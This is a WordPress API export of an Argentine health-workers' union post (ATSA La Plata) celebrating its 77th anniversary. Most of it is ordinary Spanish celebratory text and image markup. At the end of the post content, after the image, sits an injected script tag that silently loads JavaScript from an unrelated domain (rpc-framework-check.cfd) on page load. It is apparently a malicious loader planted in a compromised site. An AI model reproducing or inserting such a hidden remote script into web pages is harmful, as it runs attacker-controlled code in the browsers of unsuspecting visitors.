{"id":20382,"date":"2026-01-19T00:00:00","date_gmt":"2026-01-19T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=20382"},"modified":"2026-02-02T16:06:52","modified_gmt":"2026-02-02T19:06:52","slug":"feliz-77-aniversario-atsa-la-plata","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2026\/01\/feliz-77-aniversario-atsa-la-plata\/","title":{"rendered":"\u00a1Feliz 77\u00b0 aniversario ATSA La Plata!"},"content":{"rendered":"\n<p>Este 19 de enero, celebramos un hito fundamental en nuestra historia: 77 a\u00f1os de lucha, compromiso y solidaridad. Mirando hacia atr\u00e1s, recordamos los desaf\u00edos superados, las conquistas alcanzadas y los valores compartidos que forjaron nuestra identidad gremial.<\/p>\n\n\n\n<p>Como movimiento sindical, trabajamos incansablemente por la defensa de la fuente laboral, el convenio colectivo, la igualdad y equidad de g\u00e9nero, y la acci\u00f3n social, gremial y pol\u00edtica.<\/p>\n\n\n\n<p>Nuestro esp\u00edritu de solidaridad y compromiso con la formaci\u00f3n y capacitaci\u00f3n de nuestros afiliados y afiliadas sigue siendo la base de la acci\u00f3n gremial.<\/p>\n\n\n\n<p>Como parte de nuestra Federaci\u00f3n FATSA, nos sentimos orgullosos de ser un gremio que valora el di\u00e1logo y el respeto, virtudes esenciales de una representaci\u00f3n gremial leg\u00edtima.<\/p>\n\n\n\n<p>Agradecemos a todos nuestros compa\u00f1eros y compa\u00f1eras por ser parte de esta historia que seguimos escribiendo d\u00eda a d\u00eda.<\/p>\n\n\n\n<p>\u00a1Vamos por muchos a\u00f1os m\u00e1s juntos!\ud83c\udf8a<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos #77Aniversario<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-16-at-14.50.22.jpeg\" alt=\"\" class=\"wp-image-20383\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-16-at-14.50.22.jpeg 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-16-at-14.50.22-768x768.jpeg 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2026\/01\/WhatsApp-Image-2026-01-16-at-14.50.22-1024x1024.jpeg 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Este 19 de enero, celebramos un hito fundamental en nuestra historia: 77 a\u00f1os de lucha,&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,146,98,147,85,148],"tags":[],"class_list":["post-20382","post","type-post","status-publish","format-standard","hentry","category-afiliado","category-destacado","category-home","category-novedades","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=20382"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20382\/revisions"}],"predecessor-version":[{"id":20602,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20382\/revisions\/20602"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=20382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=20382"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=20382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}